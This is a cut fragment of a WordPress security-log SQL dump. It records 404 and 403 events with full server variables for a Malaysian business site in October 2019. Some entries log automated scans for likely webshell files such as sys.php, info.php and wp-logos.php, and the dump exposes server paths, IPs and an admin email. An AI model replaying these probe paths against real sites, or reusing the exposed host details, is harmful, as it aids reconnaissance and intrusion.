charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"C1C4F6A0-FE2D-4045-963C-D00BD79EB1A9\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XafeZNxKK3Ys46u9IjLS2AAAAME\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"113.210.179.96\";s:11:\"REMOTE_PORT\";s:5:\"20979\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XafeZNxKK3Ys46u9IjLS2AAAAME\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571282532.4417\";s:12:\"REQUEST_TIME\";s:10:\"1571282532\";}}','notice','2019-10-17 03:22:15','2019-10-17 03:22:12',35769520,37567160,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'113.210.179.96'),(28189,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:51:\"/newsite/wp-content/plugins/solid_best_corp/sys.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/newsite/wp-content/plugins/solid_best_corp/sys.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:51:\"/newsite/wp-content/plugins/solid_best_corp/sys.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XafhtaObiqYKznlLUfCEgQAAAEE\";s:19:\"REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/newsite/wp-content/plugins/solid_best_corp/sys.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:51:\"/newsite/wp-content/plugins/solid_best_corp/sys.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XafhtaObiqYKznlLUfCEgQAAAEE\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"151.80.54.15\";s:11:\"REMOTE_PORT\";s:5:\"33746\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:73:\"https://bintara.com.my/newsite/wp-content/plugins/solid_best_corp/sys.php\";s:10:\"SCRIPT_URL\";s:51:\"/newsite/wp-content/plugins/solid_best_corp/sys.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XafhtaObiqYKznlLUfCEgQAAAEE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571283381.7365\";s:12:\"REQUEST_TIME\";s:10:\"1571283381\";}}','notice','2019-10-17 03:36:24','2019-10-17 03:36:22',35662024,37467320,'https://bintara.com.my/newsite/wp-content/plugins/solid_best_corp/sys.php',1,0,'151.80.54.15'),(28190,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/newsite/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:74:\"https://bintara.com.my/newsite/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:52:\"/newsite/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xafhy6ObiqYKznlLUfCEjwAAAEQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:74:\"https://bintara.com.my/newsite/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:52:\"/newsite/wp-content/plugins/solid_best_corp/info.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xafhy6ObiqYKznlLUfCEjwAAAEQ\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"151.80.54.15\";s:11:\"REMOTE_PORT\";s:5:\"39878\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:74:\"https://bintara.com.my/newsite/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:52:\"/newsite/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xafhy6ObiqYKznlLUfCEjwAAAEQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571283403.1632\";s:12:\"REQUEST_TIME\";s:10:\"1571283403\";}}','notice','2019-10-17 03:36:45','2019-10-17 03:36:43',35040872,36838920,'https://bintara.com.my/newsite/wp-content/plugins/solid_best_corp/info.php',1,0,'151.80.54.15'),(28191,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:47:\"/v2/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:69:\"https://bintara.com.my/v2/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:47:\"/v2/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XafvJ76w7EGsr2YLNHRLDgAAAJY\";s:19:\"REDIRECT_SCRIPT_URI\";s:69:\"https://bintara.com.my/v2/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:47:\"/v2/wp-content/plugins/solid_best_corp/info.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XafvJ76w7EGsr2YLNHRLDgAAAJY\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"5.135.143.224\";s:11:\"REMOTE_PORT\";s:5:\"35553\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:69:\"https://bintara.com.my/v2/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:47:\"/v2/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XafvJ76w7EGsr2YLNHRLDgAAAJY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571286823.8618\";s:12:\"REQUEST_TIME\";s:10:\"1571286823\";}}','notice','2019-10-17 04:33:48','2019-10-17 04:33:44',35658856,37453200,'https://bintara.com.my/v2/wp-content/plugins/solid_best_corp/info.php',1,0,'5.135.143.224'),(28192,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:46:\"/v2/wp-content/plugins/solid_best_corp/sys.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:68:\"https://bintara.com.my/v2/wp-content/plugins/solid_best_corp/sys.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:46:\"/v2/wp-content/plugins/solid_best_corp/sys.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XafvNr6w7EGsr2YLNHRLEAAAAJI\";s:19:\"REDIRECT_SCRIPT_URI\";s:68:\"https://bintara.com.my/v2/wp-content/plugins/solid_best_corp/sys.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:46:\"/v2/wp-content/plugins/solid_best_corp/sys.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XafvNr6w7EGsr2YLNHRLEAAAAJI\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"5.135.143.224\";s:11:\"REMOTE_PORT\";s:5:\"37381\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:68:\"https://bintara.com.my/v2/wp-content/plugins/solid_best_corp/sys.php\";s:10:\"SCRIPT_URL\";s:46:\"/v2/wp-content/plugins/solid_best_corp/sys.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XafvNr6w7EGsr2YLNHRLEAAAAJI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571286839.0424\";s:12:\"REQUEST_TIME\";s:10:\"1571286839\";}}','notice','2019-10-17 04:34:01','2019-10-17 04:33:59',35040824,36839000,'https://bintara.com.my/v2/wp-content/plugins/solid_best_corp/sys.php',1,0,'5.135.143.224'),(28193,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/information-security/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:195:\"Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/information-security/\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/information-security/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xafzf6ObiqYKznlLUfCUwAAAAE8\";s:12:\"REDIRECT_URL\";s:22:\"/information-security/\";s:11:\"REMOTE_ADDR\";s:12:\"207.46.13.52\";s:11:\"REMOTE_PORT\";s:5:\"11596\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/information-security/\";s:10:\"SCRIPT_URL\";s:22:\"/information-security/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xafzf6ObiqYKznlLUfCUwAAAAE8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571287935.651\";s:12:\"REQUEST_TIME\";s:10:\"1571287935\";}}','notice','2019-10-17 04:52:18','2019-10-17 04:52:16',34307224,36114464,'https://bintara.com.my/information-security/',1,0,'207.46.13.52'),(28194,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-l1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-l1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-l1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xaf03qObiqYKznlLUfCWHwAAAE0\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-l1/\";s:11:\"REMOTE_ADDR\";s:13:\"207.46.13.141\";s:11:\"REMOTE_PORT\";s:5:\"15534\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-l1/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-l1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaf03qObiqYKznlLUfCWHwAAAE0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571288286.3247\";s:12:\"REQUEST_TIME\";s:10:\"1571288286\";}}','notice','2019-10-17 04:58:07','2019-10-17 04:58:06',33908832,35713656,'https://bintara.com.my/toughbook-l1/',1,0,'207.46.13.141'),(28195,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:50:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-logos.php\";s:14:\"CONTENT_LENGTH\";s:2:\"28\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-logos.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-logos.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xaf4ob6w7EGsr2YLNHRMyAAAAJg\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-logos.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-logos.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xaf4ob6w7EGsr2YLNHRMyAAAAJg\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"193.106.30.99\";s:11:\"REMOTE_PORT\";s:5:\"60044\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-logos.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-logos.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaf4ob6w7EGsr2YLNHRMyAAAAJg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571289249.7648\";s:12:\"REQUEST_TIME\";s:10:\"1571289249\";}}','notice','2019-10-17 05:14:12','2019-10-17 